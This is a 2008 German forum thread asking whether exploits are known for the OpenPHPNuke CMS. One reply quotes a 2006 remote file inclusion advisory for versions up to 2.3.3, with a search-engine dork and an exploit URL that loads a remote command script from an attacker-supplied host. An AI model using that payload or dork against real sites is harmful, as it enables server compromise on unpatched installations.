Forum

Moderiert von: stefan, spinne
Forum Index
Support
     Bug oder nicht...
     Gibts eine Exploitliste ?
Hilfe anzeigen
Hilfe anzeigen

Autor Druckerfreundliche DarstellungGibts eine Exploitliste ?
furor

Registriert: 03.03.2008
Beiträge: 106


Sende eine Private Nachricht an furor
Geschrieben: 03.03.2008 11:11

Tach !

Denke gerade drüber nach von Vbulletin auf OpenPHP Nuke umzusteigen und frage mich inwieweit es da mit der Sicherheit ist.

Sind irgendwelche Exploits bekannt oder gibts eine Liste derer ?

Grüße


Zitieren Druckerfreundliche Darstellung nach oben
Scout_GP

Registriert: 16.06.2005
Beiträge: 1054
Wohnort: Berlin


Sende eine Private Nachricht an Scout_GP Besuche die Homepage von Scout_GP
Geschrieben: 03.03.2008 11:26

Es gibt keine Exploits. Soweit ich weiß, ist bei vernünftiger Serverkonfiguration und vernünftiger OPN Konfiguration zur Zeit kein eindringen möglich.
Sollte doch eine Schwachstelle bekannt werden, so wird diese sofort korrigiert. OPN ist meines erachtens das CMS, was den höchsten Wert auf Sicherheit legt.



Gruß Scout
+++ Last.fm | Scoutweb +++

Zitieren Druckerfreundliche Darstellung nach oben
furor

Registriert: 03.03.2008
Beiträge: 106


Sende eine Private Nachricht an furor
Geschrieben: 03.03.2008 11:32

Danke, aber das denkt VBulletin auch. (Auch wenns kein CMS in dem Sinne ist :d)

Naja ich teste datt mal, danke für die Antwort :d



Zitieren Druckerfreundliche Darstellung nach oben
Gast
Unregistrierter Benutzer
Geschrieben: 03.03.2008 12:59

Im 2006 gab es ein Exploit. Das ist aber auch das einzige wo bekannt ist.
Der Bug war damals in der Version 2.3.3

Title: OpenPHPNuke <= 2.3.3 Remote File Inclusion
URL: http://www.openphpnuke.com/
Dork: inurl:/system/article/alltopics.php OR inurl:/system/user/index.php
Credits: [Oo]

Exploit: /master.php?root_path=http://yourhost/cmd.gif?cmd=ls


Das CMS hat mir der EVA ein ausgeklügelter Sicherheitsmechanismus für Angriff aller Art.


Flash
[addsig]

Zitieren Druckerfreundliche Darstellung nach oben
furor

Registriert: 03.03.2008
Beiträge: 106


Sende eine Private Nachricht an furor
Geschrieben: 03.03.2008 13:46

EVA = Eingabe/Verarbeitung/Ausgabe ?
Oder ist das ein spezieller Scriptbestandteil des CMS ?

Klingt interessant




Zitieren Druckerfreundliche Darstellung nach oben
Gast
Unregistrierter Benutzer
Geschrieben: 03.03.2008 14:49

Schau mal hier den Thread zur EVA an.

Werde schauen, dass die Customizer Module demnächst in der Doku stehen.

Flash
[addsig]

Zitieren Druckerfreundliche Darstellung nach oben
furor

Registriert: 03.03.2008
Beiträge: 106


Sende eine Private Nachricht an furor
Geschrieben: 03.03.2008 14:59

Nett, Danke das schau ich mir mal an !!

..Sobald meine 16094 files per SFTP endlich aufm US-Host sind
(t- 2:00 - 4:00 h)



Zitieren Druckerfreundliche Darstellung nach oben
sortieren nach

Hilfe anzeigen
Hilfe anzeigen
Vorheriges Thema:  Hilfää - vermutlich DB Fehler...
Nächstes Thema:  Messenger Modul und Anzahl User

Gehe zu:

Benutzername:
 
Sicherheits-Code
Sicherheits-Code
Neu laden